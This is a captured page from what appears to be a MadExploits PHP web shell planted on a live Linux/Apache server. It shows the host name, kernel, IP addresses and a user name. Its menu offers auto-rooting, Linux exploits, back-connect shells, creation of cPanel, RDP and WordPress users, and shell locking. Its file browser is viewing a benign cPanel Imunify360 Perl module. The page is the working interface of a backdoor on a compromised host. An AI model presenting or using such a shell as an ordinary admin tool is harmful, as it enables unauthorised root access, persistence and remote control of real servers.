Linux eyewebsolution.dnshostserver.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
: 185.131.55.234 | : 216.73.216.138
676 Domain
5.6.40
omxrelocation
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
sysconfig /
imunify360 /
cpanel /
conf /
[ HOME SHELL ]
Name
Size
Permission
Action
Imunify360
[ DIR ]
drwxr-xr-x
Imunify360.pm
941
B
-rw-r--r--
imunify360.png
4.91
KB
-rw-r--r--
install.json
267
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Imunify360.pm
package Cpanel::Config::ConfigObj::Driver::Imunify360; use strict; use parent qw(Cpanel::Config::ConfigObj::Interface::Config::v1); our $VERSION = '1.0'; sub init { my $class = shift; my $software_obj = shift; my $ACL_defaults = { 'thirdparty_ns' => "Imunify360", 'meta' => {}, }; Cpanel::LoadModule::load_perl_module('Cpanel::Config::LoadCpConf'); my $self = $class->SUPER::base( $ACL_defaults, $software_obj ); return $self; } sub info { my ($self) = @_; my $meta_obj = $self->meta(); my $abstract = $meta_obj->abstract(); return $abstract; } sub acl_desc { return [ { 'acl' => 'software-imunify360', 'default_value' => 0, 'default_ui_value' => 0, 'name' => 'Imunify360 plugin', 'acl_subcat' => 'Third-Party Services', }, ]; } 1;
Close